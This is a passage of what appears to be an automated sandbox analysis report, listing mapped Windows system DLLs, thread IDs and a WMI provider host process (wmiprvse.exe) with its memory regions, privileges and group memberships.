"\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2228 start_va = 0x7ff974a00000 end_va = 0x7ff974bc0fff entry_point = 0x7ff974a00000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2229 start_va = 0x7ff974bd0000 end_va = 0x7ff974c23fff entry_point = 0x7ff974bd0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2230 start_va = 0x7ff974c30000 end_va = 0x7ff975257fff entry_point = 0x7ff974c30000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2231 start_va = 0x7ff975310000 end_va = 0x7ff9753c2fff entry_point = 0x7ff975310000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2232 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2233 start_va = 0x7ff9755b0000 end_va = 0x7ff9755f3fff entry_point = 0x7ff9755b0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2234 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2235 start_va = 0x7ff975900000 end_va = 0x7ff976e24fff entry_point = 0x7ff975900000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2236 start_va = 0x7ff976f70000 end_va = 0x7ff976f77fff entry_point = 0x7ff976f70000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2237 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2238 start_va = 0x7ff977030000 end_va = 0x7ff9771f4fff entry_point = 0x7ff977030000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2239 start_va = 0x7ff977360000 end_va = 0x7ff9773b0fff entry_point = 0x7ff977360000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2240 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2241 start_va = 0x7ff977460000 end_va = 0x7ff9774bafff entry_point = 0x7ff977460000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2242 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2243 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2244 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2245 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2246 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2247 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2248 start_va = 0x7ff977cb0000 end_va = 0x7ff977d18fff entry_point = 0x7ff977cb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2249 start_va = 0x7ff977d40000 end_va = 0x7ff977de4fff entry_point = 0x7ff977d40000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2250 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2251 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 124 os_tid = 0x534 Thread: id = 125 os_tid = 0x928 Thread: id = 126 os_tid = 0x2e0 Thread: id = 127 os_tid = 0xa88 Thread: id = 128 os_tid = 0x8f4 Thread: id = 129 os_tid = 0x8d0 Thread: id = 130 os_tid = 0x8a4 Thread: id = 131 os_tid = 0x7cc Thread: id = 132 os_tid = 0x774 Thread: id = 133 os_tid = 0x770 Thread: id = 134 os_tid = 0x74c Thread: id = 135 os_tid = 0x744 Thread: id = 136 os_tid = 0x740 Thread: id = 137 os_tid = 0x73c Thread: id = 138 os_tid = 0x738 Thread: id = 139 os_tid = 0x730 Thread: id = 140 os_tid = 0x72c Thread: id = 141 os_tid = 0x70c Thread: id = 142 os_tid = 0x708 Thread: id = 143 os_tid = 0x6f8 Thread: id = 144 os_tid = 0x6cc Thread: id = 145 os_tid = 0x6c4 Thread: id = 146 os_tid = 0x6b4 Thread: id = 147 os_tid = 0x6a8 Thread: id = 148 os_tid = 0x688 Thread: id = 149 os_tid = 0x684 Thread: id = 150 os_tid = 0x61c Thread: id = 151 os_tid = 0x618 Thread: id = 152 os_tid = 0x614 Thread: id = 153 os_tid = 0x5dc Thread: id = 154 os_tid = 0x5d8 Thread: id = 155 os_tid = 0x5d4 Thread: id = 156 os_tid = 0x5d0 Thread: id = 157 os_tid = 0x5cc Thread: id = 158 os_tid = 0x5c8 Thread: id = 159 os_tid = 0x5c0 Thread: id = 160 os_tid = 0x5b8 Thread: id = 161 os_tid = 0x5b4 Thread: id = 162 os_tid = 0x5b0 Thread: id = 163 os_tid = 0x578 Thread: id = 164 os_tid = 0x45c Thread: id = 165 os_tid = 0x458 Thread: id = 166 os_tid = 0x40c Thread: id = 167 os_tid = 0xfc Thread: id = 168 os_tid = 0x3c8 Thread: id = 169 os_tid = 0x2c0 Thread: id = 170 os_tid = 0x188 Thread: id = 171 os_tid = 0x140 Thread: id = 172 os_tid = 0x12c Thread: id = 173 os_tid = 0x128 Thread: id = 174 os_tid = 0x124 Thread: id = 175 os_tid = 0x11c Thread: id = 176 os_tid = 0x40 Thread: id = 177 os_tid = 0x3fc Thread: id = 178 os_tid = 0x3f8 Thread: id = 179 os_tid = 0x3e8 Thread: id = 180 os_tid = 0x3b8 Thread: id = 181 os_tid = 0x384 Thread: id = 182 os_tid = 0x380 Thread: id = 183 os_tid = 0x378 Thread: id = 184 os_tid = 0x374 Thread: id = 185 os_tid = 0x328 Thread: id = 186 os_tid = 0x710 Thread: id = 187 os_tid = 0x4f8 Thread: id = 198 os_tid = 0xb6c Thread: id = 199 os_tid = 0x858 Thread: id = 210 os_tid = 0xba0 Thread: id = 211 os_tid = 0xba4 Process: id = "19" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x364b4000" os_pid = "0x3ec" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "18" os_parent_pid = "0x324" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0003aea4" [0xc000000f] Region: id = 2253 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2254 start_va = 0x9dfa5d0000 end_va = 0x9dfa5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfa5d0000" filename = "" Region: id = 2255 start_va = 0x9dfa5e0000 end_va = 0x9dfa5e6fff entry_point = 0x0 region_type = private name = "private_0x0000009dfa5e0000" filename = "" Region: id = 2256 start_va = 0x9dfa5f0000 end_va = 0x9dfa603fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfa5f0000" filename = "" Region: id = 2257 start_va = 0x9dfa610000 end_va = 0x9dfa68ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfa610000" filename = "" Region: id = 2258 start_va = 0x9dfa690000 end_va = 0x9dfa693fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfa690000" filename = "" Region: id = 2259 start_va = 0x9dfa6a0000 end_va = 0x9dfa6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfa6a0000" filename = "" Region: id = 2260 start_va = 0x9dfa6b0000 end_va = 0x9dfa6b1fff entry_point = 0x0 region_type = private name = "private_0x0000009dfa6b0000" filename = "" Region: id = 2261 start_va = 0x9dfa6c0000 end_va = 0x9dfa6c6fff entry_point = 0x0 region_type = private name = "private_0x0000009dfa6c0000" filename = "" Region: id = 2262 start_va = 0x9dfa6d0000 end_va = 0x9dfa6d0fff entry_point = 0x0 region_type = private name = "private_0x0000009dfa6d0000" filename = "" Region: id = 2263 start_va = 0x9dfa6e0000 end_va = 0x9dfa6e0fff entry_point = 0x0 region_type = private name = "private_0x0000009dfa6e0000" filename = "" Region: id = 2264 start_va = 0x9dfa6f0000 end_va = 0x9dfa7effff entry_point = 0x0 region_type = private name = "private_0x0000009dfa6f0000" filename = "" Region: id = 2265 start_va = 0x9dfa7f0000 end_va = 0x9dfa8adfff entry_point = 0x9dfa7f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2266 start_va = 0x9dfa8b0000 end_va = 0x9dfa92ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfa8b0000" filename = "" Region: id = 2267 start_va = 0x9dfa930000 end_va = 0x9dfaab7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfa930000" filename = "" Region: id = 2268 start_va = 0x9dfaac0000 end_va = 0x9dfaac4fff entry_point = 0x9dfaac0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2269 start_va = 0x9dfaad0000 end_va = 0x9dfaad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfaad0000" filename = "" Region: id = 2270 start_va = 0x9dfaae0000 end_va = 0x9dfaae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfaae0000" filename = "" Region: id = 2271 start_va = 0x9dfaaf0000 end_va = 0x9dfaafffff entry_point = 0x0 region_type = private name = "private_0x0000009dfaaf0000" filename = "" Region: id = 2272 start_va = 0x9dfab00000 end_va = 0x9dfae36fff entry_point = 0x9dfab00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2273 start_va = 0x9dfae40000 end_va = 0x9dfafc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfae40000" filename = "" Region: id = 2274 start_va = 0x9dfafd0000 end_va = 0x9dfb08ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfafd0000" filename = "" Region: id = 2275 start_va = 0x9dfb090000 end_va = 0x9dfb10ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfb090000" filename = "" Region: id = 2276 start_va = 0x9dfb110000 end_va = 0x9dfb20ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfb110000" filename = "" Region: id = 2277 start_va = 0x9dfb210000 end_va = 0x9dfb210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfb210000" filename = "" Region: id = 2278 start_va = 0x9dfb220000 end_va = 0x9dfb29ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfb220000" filename = "" Region: id = 2279 start_va = 0x9dfb2a0000 end_va = 0x9dfb31ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfb2a0000" filename = "" Region: id = 2280 start_va = 0x9dfb320000 end_va = 0x9dfb39ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfb320000" filename = "" Region: id = 2281 start_va = 0x9dfb3a0000 end_va = 0x9dfb41ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfb3a0000" filename = "" Region: id = 2282 start_va = 0x9dfb420000 end_va = 0x9dfb49ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfb420000" filename = "" Region: id = 2283 start_va = 0x7df5ff350000 end_va = 0x7ff5ff34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff350000" filename = "" Region: id = 2284 start_va = 0x7ff66262a000 end_va = 0x7ff66262bfff entry_point = 0x0 region_type = private name = "private_0x00007ff66262a000" filename = "" Region: id = 2285 start_va = 0x7ff66262c000 end_va = 0x7ff66262dfff entry_point = 0x0 region_type = private name = "private_0x00007ff66262c000" filename = "" Region: id = 2286 start_va = 0x7ff66262e000 end_va = 0x7ff66262ffff entry_point = 0x0 region_type = private name = "private_0x00007ff66262e000" filename = "" Region: id = 2287 start_va = 0x7ff662630000 end_va = 0x7ff66272ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff662630000" filename = "" Region: id = 2288 start_va = 0x7ff662730000 end_va = 0x7ff662752fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff662730000" filename = "" Region: id = 2289 start_va = 0x7ff662754000 end_va = 0x7ff662755fff entry_point = 0x0 region_type = private name = "private_0x00007ff662754000" filename = "" Region: id = 2290 start_va = 0x7ff662756000 end_va = 0x7ff662757fff entry_point = 0x0 region_type = private name = "private_0x00007ff662756000" filename = "" Region: id = 2291 start_va = 0x7ff662758000 end_va = 0x7ff662759fff entry_point = 0x0 region_type = private name = "private_0x00007ff662758000" filename = "" Region: id = 2292 start_va = 0x7ff66275a000 end_va = 0x7ff66275bfff entry_point = 0x0 region_type = private name = "private_0x00007ff66275a000" filename = "" Region: id = 2293 start_va = 0x7ff66275c000 end_va = 0x7ff66275dfff entry_point = 0x0 region_type = private name = "private_0x00007ff66275c000" filename = "" Region: id = 2294 start_va = 0x7ff66275e000 end_va = 0x7ff66275efff entry_point = 0x0 region_type = private name = "private_0x00007ff66275e000" filename = "" Region: id = 2295 start_va = 0x7ff662ba0000 end_va = 0x7ff662c1efff entry_point = 0x7ff662ba0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2296 start_va = 0x7ff96af80000 end_va = 0x7ff96af95fff entry_point = 0x7ff96af80000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2297 start_va = 0x7ff96b4a0000 end_va = 0x7ff96b4b3fff entry_point = 0x7ff96b4a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2298 start_va = 0x7ff96b7d0000 end_va = 0x7ff96b8c7fff entry_point = 0x7ff96b7d0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2299 start_va = 0x7ff96c2d0000 end_va = 0x7ff96c2e0fff entry_point = 0x7ff96c2d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2300 start_va = 0x7ff96df20000 end_va = 0x7ff96df9efff entry_point = 0x7ff96df20000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2301 start_va = 0x7ff973e20000 end_va = 0x7ff973e52fff entry_point = 0x7ff973e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2302 start_va = 0x7ff9741d0000 end_va = 0x7ff9741e6fff entry_point = 0x7ff9741d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2303 start_va = 0x7ff974340000 end_va = 0x7ff97434afff entry_point = 0x7ff974340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2304 start_va = 0x7ff974720000 end_va = 0x7ff97478afff entry_point = 0x7ff974720000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2305 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2306 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2307 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2308 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2309 start_va = 0x7ff976f70000 end_va = 0x7ff976f77fff entry_point = 0x7ff976f70000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2310 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2311 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2312 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2313 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2314 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2315 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2316 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2317 start_va = 0x7ff977cb0000 end_va = 0x7ff977d18fff entry_point = 0x7ff977cb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2318 start_va = 0x7ff977d40000 end_va = 0x7ff977de4fff entry_point = 0x7ff977d40000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2319 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2320 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2321 start_va = 0x9dfb4a0000 end_va = 0x9dfb51ffff entry_point = 0x0 region_type = private name = "private_0x0000009dfb4a0000" filename = "" Region: id = 2322 start_va = 0x7ff662628000 end_va = 0x7ff662629fff entry_point = 0x0 region_type = private name = "private_0x00007ff662628000" filename = "" Region: id = 2323 start_va = 0x7ff96b470000 end_va = 0x7ff96b494fff entry_point = 0x7ff96b470000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2324 start_va = 0x7ff96a550000 end_va = 0x7ff96a71dfff entry_point = 0x7ff96a550000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 2325 start_va = 0x7ff9722a0000 end_va = 0x7ff9722edfff entry_point = 0x7ff9722a0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2326 start_va = 0x7ff974520000 end_va = 0x7ff97454bfff entry_point = 0x7ff974520000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2327 start_va = 0x7ff9749b0000 end_va = 0x7ff9749f9fff entry_point = 0x7ff9749b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2328 start_va = 0x7ff972290000 end_va = 0x7ff97229dfff entry_point = 0x7ff972290000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 2329 start_va = 0x9dfb520000 end_va = 0x9dfb522fff entry_point = 0x9dfb520000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 2330 start_va = 0x7ff96cce0000 end_va = 0x7ff96ccebfff entry_point = 0x7ff96cce0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2331 start_va = 0x7ff973d00000 end_va = 0x7ff973d73fff entry_point = 0x7ff973d00000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 2332 start_va = 0x7ff974960000 end_va = 0x7ff974970fff entry_point = 0x7ff974960000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2333 start_va = 0x7ff974a00000 end_va = 0x7ff974bc0fff entry_point = 0x7ff974a00000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2334 start_va = 0x9dfb530000 end_va = 0x9dfb5affff entry_point = 0x0 region_type = private name = "private_0x0000009dfb530000" filename = "" Region: id = 2335 start_va = 0x9dfb5b0000 end_va = 0x9dfb5b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfb5b0000" filename = "" Region: id = 2336 start_va = 0x9dfb5c0000 end_va = 0x9dfb5c4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfb5c0000" filename = "" Region: id = 2337 start_va = 0x7ff662626000 end_va = 0x7ff662627fff entry_point = 0x0 region_type = private name = "private_0x00007ff662626000" filename = "" Region: id = 2338 start_va = 0x7ff96ccf0000 end_va = 0x7ff96cd06fff entry_point = 0x7ff96ccf0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2339 start_va = 0x7ff970e80000 end_va = 0x7ff970e95fff entry_point = 0x7ff970e80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2340 start_va = 0x7ff973bb0000 end_va = 0x7ff973bd5fff entry_point = 0x7ff973bb0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2341 start_va = 0x7ff973be0000 end_va = 0x7ff973bebfff entry_point = 0x7ff973be0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2342 start_va = 0x7ff9710a0000 end_va = 0x7ff9710b7fff entry_point = 0x7ff9710a0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2343 start_va = 0x7ff973fc0000 end_va = 0x7ff973ffdfff entry_point = 0x7ff973fc0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2344 start_va = 0x7ff972270000 end_va = 0x7ff972283fff entry_point = 0x7ff972270000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 2345 start_va = 0x7ff972260000 end_va = 0x7ff97226afff entry_point = 0x7ff972260000 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 2346 start_va = 0x7ff9727b0000 end_va = 0x7ff9727b9fff entry_point = 0x7ff9727b0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2347 start_va = 0x7ff96cc10000 end_va = 0x7ff96cc21fff entry_point = 0x7ff96cc10000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2348 start_va = 0x9dfb5d0000 end_va = 0x9dfb5d2fff entry_point = 0x9dfb5d0000 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 2349 start_va = 0x7ff973070000 end_va = 0x7ff973082fff entry_point = 0x7ff973070000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2350 start_va = 0x7ff974830000 